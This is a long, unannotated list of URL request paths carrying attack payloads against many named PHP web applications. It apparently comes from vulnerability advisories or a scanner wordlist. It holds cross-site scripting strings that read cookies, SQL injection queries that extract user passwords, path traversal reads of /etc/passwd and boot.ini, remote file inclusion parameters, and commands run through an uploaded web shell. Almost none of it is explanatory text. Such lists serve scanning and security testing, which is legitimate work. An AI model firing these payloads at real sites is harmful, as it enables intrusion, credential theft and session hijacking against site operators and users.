/[path]/nqgeoip.php?step=<script>alert(document.cookie)</script>
/[path]/nqports.php?step=<script>alert(document.cookie)</script>
/[path]/nqports2.php?step=<script>alert(document.cookie)</script>
/[path]/nqports2.php?body=<script>alert(document.cookie)</script>
/[path]/portlist.php?portnum=<script>alert(document.cookie)</script>
/vbzoomforum/show.php?UserID=1&MainID=10&SubjectID=[sql]
/com/guestbook.php?admin="><script>alert(document.cookie)</script><!-- 
/path/demo.php?digit=">XSS 
/results.php?searchtype="><script>XSS</script>category&searchterm=Announcements
/results.php?searchtype=category&searchterm="><script>XSS</script>Announcements
/results.php?start=0&searchtype="><script>XSS</script>category&searchterm=Announcements
/results.php?start=0&searchtypecategory&searchterm=Announcements="><script>XSS</script>
/categorysearch.php?star=0&searchtype="><script>XSS></script>category&searchterm=Announcements
/categorysearch.php?star=0&searchtypecategory&searchterm=Announcements"><script>XSS</script> 
/bmb/topic.php?forumid=6&filename=38496&page=2[XSS-CODE]
/bmb/topic.php?forumid=6&filename=38496[XSS-CODE]&page=2
/topic.php?filename=1923[XSS-CODE]
/bmb/forums.php?forumid=6[XSS-CODE]
/bmb/forums.php?forumid=6&listby=posttime[XSS-CODE]&jinhua=&page=
/bmb/forums.php?forumid=6&listby=posttime&jinhua=[XSS-CODE]&page=
/bmb/forums.php?forumid=6&listby=posttime&jinhua=&page=[XSS-CODE]
/post.php?forumid=2\[XSS-CODE]
/announcesys.php?forumid=0[XSS-CODE] 
/readpm.php?op=read&ID=2&name=pruebas&user=waltrapass
/readpm.php?op=read&ID=2&user=waltrapass
/readpm.php?op=del&ID=2&name=pruebas&user=waltrapass
/readpm.php?op=del&ID=2&user=waltrapass 
/public_html/lists/admin/?page=admin&id=INJECT HERE
/lists/admin/?page=members&id=1%20union%20select%20null,password,null,null%20from%20phplist_admin%20where%20superuser=1/*sp_password 
/index.php?pg=modules/forum/viewprofil.php&membres=[Code-XSS]
/index.php?pg=modules/forum/viewtopic.php&Forum=[Code-XSS]&pgfull 
/index.php?pg=&L=[variable-injection]&H=[variable-injection]
/index.php?pg=modules/forum/viewtopic.php&Forum=Forum%20de%20d?monstration.&msg=1103495330.dat&pgfull[variable-injection]
/index.php?pg=http
/index.php?pg=modules/forum/viewprofil.php&membres=[variable-injection]&pgfull[variable-injection]
/index.php?pg=modules/forum/viewprofil.php&membres=[variable-injection]
/index.php?pg=modules/forum/viewtopic.php&Forum=[change-or-variable-injection].&msg=1103495330.dat&pgfull 
/vbzoom/profile.php?UserID=1&UserName=<br><script>alert(document.cookie);</script>
/vbzoom/login.php?UserID='<br><script>alert(document.cookie);</script> 
/index.php?username="><script>alert(document.cookie)</script>
/index.php?date=22&month=3&year=2005%20UNION%20SELECT%200,0,0,0,0,0,
/index.php?date=22%20UNION%20SELECT%200,0,0,0,0,0,username,pass%20
/admin.php?action=report_statistics&report=visitors&list_from=[SQL-Injection] 
/admin.php?action=content_edit&contentid=[XSS-Code] 
/admin.php?action=report_statistics&report=visitors&&s=[XSS-Code]
/CP/account_manage.php/login.php 
/eventum/view.php?id=1'%22%3E%3Ciframe%3E
/eventum/list.php?keywords=&users=&category=&release=%22%3E%3Ciframe%3E
/eventum/get_jsrs_data.php?F=wee%22%3E%3Ciframe%3E 
/lost_password.php?&email=<script>var%20xss=31337;alert(xss);</script>&reset=reset 
/shop_display_products.php?cat_id=' 
/Includes/validsession.php?strRootpath=');}//%20--></script><script>alert(document.cookie)</script>
/Admin/News/List.php?strTable=<script>alert(document.cookie)</script><!--
/portailphp/index.php?affiche=Forum-read_mess&id=' 
/oneadmin/config.php?path[docroot]=http
/dwt_editor/dwt_editor.php?language=english[XSS-CODE]&cur_dir=%2Fscripting%2Fphp%2Fdwteditor%2Fdwt_editor
/dwt_editor/dwt_editor.php?language=english&cur_dir=[XSS-CODE]%2Fscripting%2Fphp%2Fdwteditor%2Fdwt_editor
/dwt_editor/dwt_editor.php?do=editarea&cur_dir=%2Fscripting%2Fphp%2Fdwteditor%2Fdwt_editor%2Ffiles%2Fzweit+ebene&file=5db14c3963eff6b87ce20155708fd867&language=german&area=textbereich2[XSS-CODE] 
/newsletter/jax_newsletter.php?language=German[XSS-CODE]&ml_id=1
/newsletter/sign_in.php?do=sign_in&language=german[XSS-CODE]&ml_id=1&ml_id=1
/newsletter/archive.php?language=spanish[XSS-CODE]
/guestbook/jax_guestbook.php?page=2&language=english&guestbook_id=0&gmt_ofs=0[XSS-CODE]
/guestbook/jax_guestbook.php?page=2&language=english[XSS-CODE]&guestbook_id=0&gmt_ofs=0
/guestbook/jax_guestbook.php?page=2[XSS-CODE]&language=english&guestbook_id=0&gmt_ofs=0
/guestbook/jax_guestbook.php?mailto=9aa43a5efc2585681c97993d777bcd41&language=english[XSS-CODE]
/linklists/jax_linklists.php?language=English[XSS-CODE]
/linklists/jax_linklists.php?do=list&list_id=0&language=english&cat=Religion[XSS-CODE]
/calendar/jax_calendar.php?Y=2005[XSS-CODE]&m=8&d=2&do=show_event&key=db6165c8fd09437c00badaf419eb0db5&cal_id=0&language=spanish&gmt_ofs=0&view=d30&evt_date=29.07.2005+10%3A00+-%3Cbr%3E09.10.2005+18%3A00&evt_title=Karlsruhe+-+Ausstellung%3A+K%F6rper+im+elektromagnetischen+Feld
/calendar/jax_calendar.php?Y=2005&m=8[XSS-CODE]&d=2&do=show_event&key=db6165c8fd09437c00badaf419eb0db5&cal_id=0&language=spanish&gmt_ofs=0&view=d30&evt_date=29.07.2005+10%3A00+-%3Cbr%3E09.10.2005+18%3A00&evt_title=Karlsruhe+-+Ausstellung%3A+K%F6rper+im+elektromagnetischen+Feld
/calendar/jax_calendar.php?Y=2005&m=8&d=2[XSS-CODE]&do=show_event&key=db6165c8fd09437c00badaf419eb0db5&cal_id=0&language=spanish&gmt_ofs=0&view=d30&evt_date=29.07.2005+10%3A00+-%3Cbr%3E09.10.2005+18%3A00&evt_title=Karlsruhe+-+Ausstellung%3A+KF6rper+im+elektromagnetischen+Feld
/calendar/jax_calendar.php?Y=2005&m=8&d=2&do=show_event&key=db6165c8fd09437c00badaf419eb0db5&cal_id=0[XSS-CODE]&language=spanish&gmt_ofs=0&view=d30&evt_date=29.07.2005+10%3A00+-%3Cbr%3E09.10.2005+18%3A00&evt_title=Karlsruhe+-+Ausstellung%3A+KF6rper+im+elektromagnetischen+Feld
/calendar/jax_calendar.php?Y=2005&m=8&d=2&do=show_event&key=db6165c8fd09437c00badaf419eb0db5&cal_id=0&language=spanish[XSS-CODE]&gmt_ofs=0&view=d30&evt_date=29.07.2005+10%3A00+-%3Cbr%3E09.10.2005+18%3A00&evt_title=Karlsruhe+-+Ausstellung%3A+K%F6rper+im+elektromagnetischen+Feld
/calendar/jax_calendar.php?Y=2005&m=8&d=2&do=show_event&key=db6165c8fd09437c00badaf419eb0db5&cal_id=0&language=spanish&gmt_ofs=0[XSS-CODE]&view=d30&evt_date=29.07.2005+10%3A00+-%3Cbr%3E09.10.2005+18%3A00&evt_title=Karlsruhe+-+Ausstellung%3A+K%F6rper+im+elektromagnetischen+Feld
/calendar/jax_calendar.php?Y=2005&m=8&d=2&do=show_event&key=db6165c8fd09437c00badaf419eb0db5&cal_id=0&language=spanish&gmt_ofs=0&view=d30[XSS-CODE]&evt_date=29.07.2005+10%3A00+-%3Cbr%3E09.10.2005+18%3A00&evt_title=Karlsruhe+-+Ausstellung%3A+K%F6rper+im+elektromagnetischen+Feld
/calendar/jax_calendar.php?Y=2005&m=8&d=2&do=show_event&key=db6165c8fd09437c00badaf419eb0db5&cal_id=0&language=spanish&gmt_ofs=0&view=d30&evt_date=29.07.2005+10%3A00+-%3Cbr%3E09.10.2005+18%3A00[XSS-CODE]&evt_title=Karlsruhe+-+Ausstellung%3A+K%F6rper+im+elektromagnetischen+Feld
/calendar/jax_calendar.php?Y=2005&m=8&d=2&do=show_event&key=db6165c8fd09437c00badaf419eb0db5&cal_id=0&language=spanish&gmt_ofs=0&view=d30&evt_date=29.07.2005+10%3A00+-%3Cbr%3E09.10.2005+18%3A00&evt_title=Karlsruhe+-+Ausstellung%3A+K%F6rper+im+elektromagnetischen+Feld[XSS-CODE]
/petitionbook/shrimp_petition.php?page=3&language=English&guestbook_id=0&gmt_ofs=0[XSS-CODE]
/petitionbook/shrimp_petition.php?page=3&language=English[XSS-CODE]&guestbook_id=0&gmt_ofs=0
/petitionbook/shrimp_petition.php?page=3[XSS-CODE]&language=English&guestbook_id=0&gmt_ofs=0
/guestbook/guestbook
/guestbook/guestbook_ips2block
/guestbook/ips2block
/guestbook/formmailer/logfile.csv
/petitionbook/formmailer.log
/petitionbook/ips2block
/petitionbook/petitionbook
/linklists/suggestions.csv
/newsletter/logs/jnl_records 
/messages.php?msg_view=' 
/deletethread.php?board_id="><script>alert(document.cookie)</script> 
/calendarexpress/login.php?cid=' 
/calendarexpress/auth.php?cid=' 
/calendarexpress/subscribe.php?cid=' 
/calendarexpress/search.php?allwords=<br><script>alert(document.cookie);</script>&cid=0&title=1&desc=1 
/[path]/?fontcolor='><script>alert(document.cookie)</script> 
/funkboard/editpost.php?fbusername="><script>alert(document.cookie)</script>
/funkboard/editpost.php?fbpassword="><script>alert(document.cookie)</script>
/funkboard/prefs.php?fbpassword="><script>alert(document.cookie)</script>
/funkboard/prefs.php?fbusername="><script>alert(document.cookie)</script>
/funkboard/newtopic.php?forumid=1&fbusername="><script>alert(document.cookie)</script>
/funkboard/newtopic.php?forumid=1&fbpassword="><script>alert(document.cookie)</script>
/funkboard/newtopic.php?forumid=1&subject="><script>alert(document.cookie)</script>
/funkboard/reply.php?forumid=1&threadid=1&fbusername="><script>alert(document.cookie)</script>
/funkboard/reply.php?forumid=1&threadid=1&fbpassword="><script>alert(document.cookie)</script>
/funkboard/profile.php?fbusername="><script>alert(document.cookie)</script>
/funkboard/profile.php?fbpassword="><script>alert(document.cookie)</script>
/funkboard/register.php?fbusername="><script>alert(document.cookie)</script>
/funkboard/register.php?fmail="><script>alert(document.cookie)</script>
/funkboard/register.php?www="><script>alert(document.cookie)</script>
/funkboard/register.php?icq="><script>alert(document.cookie)</script>
/funkboard/register.php?yim="><script>alert(document.cookie)</script>
/funkboard/register.php?location="><script>alert(document.cookie)</script>
/funkboard/register.php?sex="><script>alert(document.cookie)</script>
/funkboard/register.php?interebbies="><script>alert(document.cookie)</script>
/funkboard/register.php?sig=&lt;/textarea&gt;<script>alert(document.cookie)</script>
/funkboard/register.php?aim="><script>alert(document.cookie)</script> 
/news/index.php?action=com&id='SQL_HERE
/cw/index.php?action=details&id='SQL_HERE
/gb/index.php?von='SQL_HERE
/umfragen/index.php?action=vote&insert='SQL_HERE 
/ezupload/index.php?path=http
/ezupload/initialize.php?path=http
/ezupload/customize.php?path=http
/ezupload/form.php?path=http
/PHPTB/index.php?sid=cc3de2fc8c2b357b6a6d46ea8aa92a32&act=profile&mid=-99%20UNION%20SELECT%20null,password,password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20FROM%20tb_members%20WHERE%20user_id=1
/PHPTB/index.php?sid=a284c075e8b0073935ba7290ca0dade8&act=newpm&mid=-99%20UNION%20SELECT%20password%20FROM%20tb_members%20WHERE%20user_id=1 
/index.php?VDNS_Sessid=[sessid]&message=[some error msg]<iframe src="http
/member.php?action=login 
/member.php?action='[SQL Injection]
/polls.php?action=newpoll&tid=1&polloptions='[SQL INJECTION]
/search.php?action='[SQL Injection]
/[path]/index.php?currDir=./<script>alert(document.cookie)</script>
/index.php?currDir=./test&pageType=image&image=<script>alert(document.cookie)</script> 
/index.php?c=srch&ctg=Cat_1&id=754ce025144839c2abe369c3
/index.php?c=srch&ctg=Cat_1&id=754ce025144839c2abe369c3
/index.php?c=srch&ctg=Cat_1&id=754ce025144839c2abe369c36d90d8e9&key=1&comp=1&min=1&max=><script>var%20xss=31337;alert(xss);</script 
/index.php?c=srch&ctg=Cat_1&id=754ce025144839c2abe369c3
/index.php?id=754ce025144839c2abe369c36d90d8e9&c=srch&i
/phpfn/SearchResults.php?Match='&NewsMode=1&SearchNews=Search&CatID=0
/phpfn/SearchResults.php?Match=1&NewsMode=1&SearchNews=Search&CatID='
/phpfn/SearchResults.php?Match=%27&NewsMode=1&SearchNews=Search&CatID=0
/phpfn/SearchResults.php?Match=1&NewsMode=1&SearchNews=Search&CatID=%27 
/phpfn/NewsCategoryForm.php?NewsMode="><script>alert(XSS);</script>&CatID=0
/phpfn/SearchResults.php?Match='><script>alert(XSS);</script>&NewsMode=1&SearchNews=Search&CatID=0
/phpfn/SearchResults.php?Match=1&NewsMode=1&SearchNews=Search&CatID='><script>alert(XSS);</script>
/phpfn/SearchResults.php?Match=1&NewsMode="><script>alert(XSS);</script>&SearchNews=Search&CatID=0
/phpfn/SearchResults.php?Match="><script>alert(XSS);</script>&NewsMode=1&SearchNews=Search&CatID=0 
/classes/admin_o.php?absolutepath=http
/classes/board_o.php?absolutepath=http
/classes/dev_o.php?absolutepath=http
/classes/file_o.php?absolutepath=http
/classes/tech_o.php?absolutepath=http
/w-agora/index.php?site=../../../../../../../../boot.ini%00
/w-agora/index.php?site=../../../../../../../../etc/passwd%00
/w-agora/index.php?site=../../../../../../../../etc/passwd
/w-agora/index.php?site=%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afboot.ini
/w-agora/index.php?site=../../../../../../../../boot.ini 
/tour/login.php?course="><script>alert('XSS');</script> 
/view_all_set.php?sort=severity&dir="><script>alert(document.cookie)</script>&type=2
/core/database_api.php?g_db_type=mysql
/core/database_api.php?g_db_type=mysql
/core/database_api.php?g_db_type=informix
/core/database_api.php?g_db_type=mysql
/modcp.php?action=post_del&x='SQL_CODE_HERE
/modcp.php?action=post_del&x=6&y='SQL_CODE_HERE 
/ldu/links.php?c=links&s=title&w=' 
/ldu/journal.php?m='&s=username&w=asc
/ldu/journal.php?m='&p=1
/ldu/journal.php?m=' 
/ldu/list.php?c=articles&s=title&w=asc&o='&p=1
/ldu/list.php?c=articles&s=title&w='&o=1&p=1
/ldu/list.php?c=articles&s='&w=asc&o=1&p=1 
/ldu/forums.php?filter=forums%2Ephp%3Fc%3Dskin&x='
/ldu/forums.php?m=topics&q=3&n=' 
/ldu/forums.php?m='&q=3&n=last 
/ldu/forums.php?m=topics&s=' 
/ldu/journal.php?m=home&s=username&w='><script>alert('test');</script> 
/ldu/index.php?c='><script>alert('test');</script>
/ldu/index.php?m='><script>alert('test');</script>
/nephp/browse.php?mod=find&keywords='%3E%3Cscript%3Ealert('test');%3C/script%3E 
/phpkit/include.php?path=login/member.php&letter=phuket'%20AND%20MID(user_pw,1,1)='8'/* 
/runcms/modules/newbb_plus/newtopic.php?forum=-99%20UNION%20SELECT%201,1,1,1,1,1,1,1,1,1,1,1,1,1,1,pass,1,1%20FROM%20runcms_users%20WHERE%201/*
/runcms/modules/newbb_plus/edit.php?forum=-99%20UNION%20SELECT%201,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1%20FROM%20runcms_users%20WHERE%201/*&post_id=2'&topic_id=2&viewmode=flat&order=0
/runcms/modules/newbb_plus/reply.php?forum=-99%20UNION%20SELECT%201,1,1,1,1,1,1,1,1,1,1,1,1,1,1,pass,1,1%20FROM%20runcms_users%20WHERE%201/*&post_id=2&topic_id=2&viewmode=flat&order=0
/runcms/modules/messages/print.php?msg_id=-99%20UNION%20SELECT%201,uname,1,1,1,pass%20FROM%20runcms_users%20WHERE%201/*&op=print_pn
/runcms/modules/messages/print.php?msg_id=-99%20UNION%20SELECT%201,uname,1,1,1,pass%20FROM%20runcms_users%20WHERE%201/*&op=print_sent_pn 
/[DIR]/index.php?module=Comments&req=moderate&moderate=<center><h1>xss
/PostNuke-0.760-RC4b/html/user.php?op=edituser&htmltext=<h1>xss 
/[DIR]/index.php?name=Downloads&req=viewdownload&cid=1&show=[SQL%20INJECTION] 
/saveweb/admin/PhpMyExplorer/editerfichier.php?chemin=.&fichier=header.php&type=Source 
/menu_dx.php?SITE_Path=http
/menu_sx.php?CONTENTS_Dir=http
/saveweb/footer.php?TABLE_Width=><script>alert(document.cookie)</script>
/saveweb/footer.php?SITE_Author_Domain=><script>alert(document.cookie)</script>
/saveweb/footer.php?SITE_Author=><script>alert(document.cookie)</script>
/saveweb/footer.php?L_Info=><script>alert(document.cookie)</script>
/saveweb/footer.php?L_Help=><script>alert(document.cookie)</script>
/saveweb/header.php?TABLE_Width=><script>alert(document.cookie)</script>
/saveweb/header.php?L_Visitors=><script>alert(document.cookie)</script>
/saveweb/header.php?count=><script>alert(document.cookie)</script>
/saveweb/header.php?SITE_Logo="><script>alert(document.cookie)</script>
/saveweb/header.php?BANNER_Url="><script>alert(document.cookie)</script>
/saveweb/header.php?L_Sunday="}</script><script>alert(document.cookie)</script><!--
/saveweb/header.php?L_Monday="}</script><script>alert(document.cookie)</script><!--
/saveweb/header.php?L_January="}</script><script>alert(document.cookie)</script><!--
/saveweb/header.php?L_February="}</script><script>alert(document.cookie)</script><!--
/saveweb/header.php?IMAGES_Url="><script>alert(document.cookie)</script><!--
/saveweb/header.php?L_Info="><script>alert(document.cookie)</script><!--
/saveweb/header.php?L_Help="><script>alert(document.cookie)</script><!--
/saveweb/menu_dx.php?L_InsertCorrectly=<script>alert(document.cookie)</script>
/saveweb/menu_dx.php?L_MENUDX_Login=<script>alert(document.cookie)</script><!--
/saveweb/menu_dx.php?L_MENUDX_Username=<script>alert(document.cookie)</script><!--
/saveweb/menu_dx.php?L_MENUDX_Password=<script>alert(document.cookie)</script><!--
/saveweb/menu_dx.php?L_Ok=<script>alert(document.cookie)</script><!--
/saveweb/menu_dx.php?IMAGES_Url="><script>alert(document.cookie)</script><!--
/saveweb/menu_dx.php?L_MENUDX_Registration="><script>alert(document.cookie)</script><!--
/saveweb/menu_dx.php?BANNER_Url="><script>alert(document.cookie)</script><!--
/saveweb/menu_dx.php?L_MENUSX_Newsletter=<script>alert(document.cookie)</script><!--
/saveweb/menu_dx.php?L_MENUDX_InsertEMail=<script>alert(document.cookie)</script><!--
/saveweb/menu_sx.php?L_InsertNOK3Char=");}</script><script>alert(document.cookie)</script><script>
/saveweb/menu_sx.php?L_MENUSX_Channels=<script>alert(document.cookie)</script><script>
/saveweb/menu_sx.php?L_MENUSX_Home=<script>alert(document.cookie)</script><script>
/saveweb/menu_sx.php?L_MENUSX_Archive=<script>alert(document.cookie)</script>
/saveweb/menu_sx.php?L_Search=<script>alert(document.cookie)</script>
/saveweb/menu_sx.php?L_Ok=<script>alert(document.cookie)</script>
/saveweb/menu_sx.php?IMAGES_Url="><script>alert(document.cookie)</script>
/saveweb/menu_sx.php?L_MENUSX_Services="><script>alert(document.cookie)</script>
/saveweb/menu_sx.php?L_MENUSX_Links="><script>alert(document.cookie)</script>
/saveweb/menu_sx.php?L_MENUSX_Newsletter="><script>alert(document.cookie)</script>
/saveweb/menu_sx.php?L_MENUSX_Polls="><script>alert(document.cookie)</script>
/saveweb/menu_sx.php?L_MENUSX_ECards="><script>alert(document.cookie)</script>
/saveweb/menu_sx.php?L_MENUSX_Downloads="><script>alert(document.cookie)</script>
/saveweb/menu_sx.php?L_MENUSX_Community="><script>alert(document.cookie)</script>
/saveweb/menu_sx.php?L_MENUSX_Forum="><script>alert(document.cookie)</script>
/saveweb/menu_sx.php?L_MENUSX_Chat="><script>alert(document.cookie)</script>
/saveweb/menu_sx.php?L_MENUSX_Nicknames="><script>alert(document.cookie)</script>
/saveweb/menu_sx.php?L_MENUSX_Membership="><script>alert(document.cookie)</script>
/saveweb/menu_sx.php?L_MENUSX_Login="><script>alert(document.cookie)</script>
/saveweb/menu_sx.php?L_MENUSX_UserProfile="><script>alert(document.cookie)</script>
/saveweb/menu_sx.php?L_MENUSX_PasswordForgot="><script>alert(document.cookie)</script>
/saveweb/menu_sx.php?L_MENUSX_Logout="><script>alert(document.cookie)</script>
/saveweb/menu_sx.php?L_MENUSX_Contacts="><script>alert(document.cookie)</script>
/saveweb/menu_sx.php?L_MENUSX_Guestbook="><script>alert(document.cookie)</script>
/saveweb/menu_sx.php?L_MENUSX_ContactUs="><script>alert(document.cookie)</script> 
/saveweb/menu_dx.php?SITE_Path=../../../../../boot.ini%00
/saveweb/menu_sx.php?CONTENTS_Dir=../../../../../boot.ini%00
/saveweb/menu_dx.php?SITE_Path=../../../../../[script].php%00
/saveweb/menu_sx.php?CONTENTS_Dir=../../../../../[script].php%00 
/xxxxx/api.php?t_path_core=http
/[path]/footer.php?version[fullname]=</a><script>alert('lol')</script>
/[path]/footer.php?version[homepage]="><script>alert('lol')</script>
/[path]/footer.php?version[no]=<script>alert('lol')</script>
/[path]/header.php?version[fullname]=<script>alert('lol')</script>
/[path]/header.php?version[no]=</title><script>alert('lol')</script>
/[path]/header.php?version[author]=--><script>alert('lol')</script>
/[path]/header.php?version[email]=--><script>alert('lol')</script> 
/ldu/index.php?c='
/ldu/index.php?c=%27
/ldu/events.php?c='
/ldu/events.php?f=incoming&c='
/ldu/events.php?c=%27
/ldu/events.php?f=incoming&c=%27
/ldu/list.php?c='&s=title&w=asc&o=1&p=1
/ldu/list.php?c=%27&s=title&w=asc&o=1&p=1 
//al_initialize.php?alpath=ftp
/phpldapadmin/welcome.php?custom_welcome_page=../../../../../../../../etc/passwd
/phpldapadmin/welcome.php?custom_welcome_page=http
/index.php?mod=read&id=../forum/users/[user].php%00 
/forum/index.php?op=vis_reg&usr="><script>alert('LOL%20%20')</script><!-- 
/admin/lang.php?CMS_ADMIN_PAGE=1&nls[file][vx][vxsfx]=(__URL__)" method=post>
/script?cookie="+escape(document.cookie)</script> 
/upload/dl/[filename].inc?c=ls%20-la
/upload/dl/[filename].inc?c=cat%20/etc/passwd
/upload/dl/[filename].inc?c=cat%20.././config/md-config.php 
/modules.php?op=modload&name=subjects&file=print&print=<script>alert('LOL')</script>
/modules.php?op=modload&name=Messages&file=bb_smilies&sitename=</title><script>alert(LOL')</script>
/modules.php?op=modload&name=Messages&file=bbcode_ref&sitename=</title><script>alert(LOL')</script>
/javascript/openwindow.php?hlpfile=")<html><script>alert(document.cookie)</script> 
/forumdisplay.php?fid=2&datecut=<http
/misc.php?action=rules&fid=-1' [SQL]
/[path]/webadmin/login.php and use this
/pblang/setcookie.php?u=../../../../../etc/passwd%00 
/[path]/thankyou.php?LocationID="><script>alert('LOL')</script>
/[path]/calDaily.php?font="><script>alert('LOL')<script><"
/[path]/calMonthly.php?font="><script>alert('LOL'</script><"
/[path]/calMonthlyP.php?font="><script>alert('LOL')</script><"
/[path]/calWeekly.php?font="><script>alert('LOL')</script><"
/[path]/calWeeklyP.php?font="><script>alert('LOL')</script><"
/[path]/calYearly.php?font="><script>alert('LOL')</script><"
/[path]/calYearlyP.php?font="><script>alert('LOL')</script><"
/[path]/day.php?font="><script>alert('LOL')</script><!--
/[path]/day.php?LocationID="><script>alert('LOL')</script><!--
/[path]/event.php?font="><script>alert('LOL')</script>
/[path]/event.php?CeTi=</title><script>alert('LOL')</script>
/[path]/event.php?Contact=<script>alert('LOL')</script>
/[path]/event.php?Description=<script>alert('LOL')</script>
/[path]/event.php?ShowAddress=<script>alert('LOL')</script>
/[path]/week.php?font="><script>alert('LOL')</script> 
/include_this/news.php?cat=[SQL]
/include_this/news.php?id=[SQL]
/include_this/news.php?stof=[SQL] 
/print.php?id=[SQL]
/ratethread.php" method="post">
/[dir]/s.pl?e=1&subscribe=subscribe&l=../../../../../../../../etc/passwd%00&SUBMIT=%20%20Submit%20%20
/[dir]/s.pl?e=enter%20your%20email%20address%20here&subscribe=subscribe&l=../../../../../../../../etc/passwd%00 
/auth.php?m=all'%20;%20AND%20THIS=VULN
/auth.php?m='%20;%20AND%20THIS=VULN
/plug.php?e=topitems';AND%20THIS=LAME 
/atutor/password_reminder.php
/atutor/content/chat/2/msgs/1.message
/atutor/content/chat/2/msgs/2.message
/atutor/content/chat/2/msgs/3.message 
/classifieds/index.php?methode=showdetails&list=Advertisment&rollid=4' 
/cgi-bin/view/Main/TWikiUsers?rev=2%20%7Cless%20/etc/passwd 
/classifieds/index.php?methode=showdetails&list=Advertisment&rollid=4'<script>alert(document.cookie)</script> 
/search_result.php?Sex=male&LookingFor=female&DateOfBirth_start=18&DateOfBirth_end=40&Country%5B%5D=0UNION 
/topic.php?tid=[code]
/misc.php?sub=profile&uid=[code]
/forums.php?fid=[code]
/pm.php?sub=newpm&uid=[code]
/newpost.php?sub=newthread&fid=[code] 
/index.php?show=c2w_news%2Ephp&cat=news_archiv
/index.php?show=%3C/textarea%3E%3Cscript%3Ealert(%27XSS
/index.php?show=[file]&cat=news_archiv&start=1 
/index.php?read=../../../../../../../../../../../../../../etc/passwd 
/index.php?o='[SQL INJECTION]
/index.php?sort='[SQL INJECTION] 
/admincp/css.php?do=doedit&dostyleid=1&group=[XSS]
/modcp/index.php?do=frames&loc=[XSS]
/admincp/index.php?redirect=[XSS]
/admincp/index.php?do=frames&loc=[XSS]
/modcp/user.php?do=gethost&ip=[XSS]
/admincp/user.php?do=emailpassword&email=[XSS]
/admincp/language.php?do=rebuild&goto=[XSS]
/admincp/modlog.php?do=view&orderby=[XSS]
/admincp/template.php?do=colorconverter&hex=[XSS]
/admincp/template.php?do=colorconverter&rgb=[XSS]
/admincp/template.php?do=modify&expandset=[XSS]
/index.php?mod=pages&idp='[SQL INJECTION]
/index.php?mod=pages&id_ctg='[SQL INJECTION]
/index.php?mod=pages&id_prd='[SQL INJECTION] 
/phpatm/viewers/txt.php?currentdir=../../../../../../../etc/passwd%00
/phpatm/viewers/txt.php?currentdir=../../../../../../../etc&filename=passwd
/phpatm/viewers/htm.php?current_dir=../../../../../../../etc/passwd%00
/phpatm/viewers/htm.php?current_dir=../../../../../../../etc&filename=passwd
/phpatm/viewers/html.php?current_dir=../../../../../../../etc/passwd%00
/phpatm/viewers/html.php?current_dir=../../../../../../../etc&filename=passwd
/phpatm/viewers/htm.php?current_dir=http
/phpatm/html.php?current_dir=http
/phpatm/viewers/zip.php?current_dir=../../../../../../../[filename].zip%00
/phpatm/viewers/zip.php?current_dir=../../../../../../..&filename=[filename].zip
/phpatm/viewers/txt.php?current_dir=../include&filename=conf.php
/phpatmviewers/txt.php?current_dir=../userstat&filename=[admin_name].stat
/phpatm/viewers/txt.php?current_dir=../users/admin%00
/phpatm/viewers/txt.php?current_dir=../users/[admin_name]%00 
/phpatm/viewers/txt.php?font=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
/phpatm/viewers/txt.php?normalfontcolor=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
/phpatm/viewers/txt.php?mess[31]=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E 
/[path]/phpmyfaq/admin/footer.php?PMF_CONF[version]=<script>alert(document.cookie)</script>
/[path]/phpmyfaq/admin/header.php?PMF_LANG[metaLanguage]="><script>alert(document.cookie)</script> 
/[path]/phpmyfaq/index.php?LANGCODE=/../../../../../../etc/passwd%00
/[path]/phpmyfaq/index.php?LANGCODE=/../../../../[scriptname] 
/phpmyfaq/data/tracking[date] 
/index.php?page=<script>alert(document.cookie);</script> 
/[cms]/index.php?<script>alert(document.cookie);</script>
/[cms]/?<script>alert(document.cookie);</script> 
/cc3/index.php?searchStr=%3D%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&act=viewCat&Submit=Go
/cc3/index.php?act=login&redir=L3NpdGUvZGVtby9jYzMvaW5kZXgucGhwP2FjdD12aWV3RG9jJmFtcDtkb2NJZD0x[XSS-CODE] 
/cc3/cart.php?act=reg&redir=L3NpdGUvZGVtby9jYzMvaW5kZXgucGhwP3NlYXJjaFN0cj0lMjIlM0UlM0NzY3JpcHQlM0VhbGVydCUyOCUyOSUzQyUyRnNjcmlwdCUzRSZh
/cc3/cart.php?act=reg&redir=[XSS-CODE]
/squirrelmail_root_dir/plugins/address_add/add.php?first=HOVER%20ME!%22%20onMouseOver=%22alert('foo');
/printfaq.php?lng=en&pg=/../../../../../../../etc/passwd%00 
/myBloggie/index.php?mode=search"
/[path]/header.php?sitetitle=</title><script>alert(document.cookie)</script><!--
/[path]/footer.php?version=<script>alert(document.cookie)</script>
/[path]/footer.php?query_count=<script>alert(document.cookie)</script> 
/[path]/newmsg.php?fid=''%20UNION%20SELECT%20nick,%20password,%20null,%20null%20FROM%20[table_pr\efix]users%20/*
/[path]/include/footer.php?t_login=<script>alert(document.cookie)</script>
/path-to-yapig/view.php?gid=1&phid=1&img_size=><script>alert('hi')</script> 
/[php-counter]/list.php?c='&s=' 
/[php-counter]/list.php?c='><script>alert(document.cookie);</script> 
/search.php?action=search&keywords=&author=d3vilbox&forum=-1&search_in=all&sort_by=0&sort_dir=DESC&show_as=topics&search=Submit&old_searches[]=[sql-injection] 
/web/edit/upgrade_in_progress_backend.php?target_url=">[code]
/squizlib/bodycopy/pop_ups/insert_table.php?bgcolor=</style>[code]
/squizlib/bodycopy/pop_ups/edit_table_cell_props.php?bgcolor=</style>[code]
/squizlib/bodycopy/pop_ups/header.php?bgcolor=</style>[code]
/squizlib/bodycopy/pop_ups/edit_table_row_props.php?bgcolor=</style>[code]
/squizlib/bodycopy/pop_ups/edit_table_props.php?bgcolor=</style>[code]
/squizlib/bodycopy/pop_ups/edit_table_cell_type_wysiwyg.php?stylesheet=">[code] 
/web/edit/upgrade_functions/new_upgrade_functions.php?INCLUDE_PATH=http
/web/edit/upgrade_functions/new_upgrade_functions.php?SQUIZLIB_PATH=http
/web/init_mysource.php?INCLUDE_PATH=http
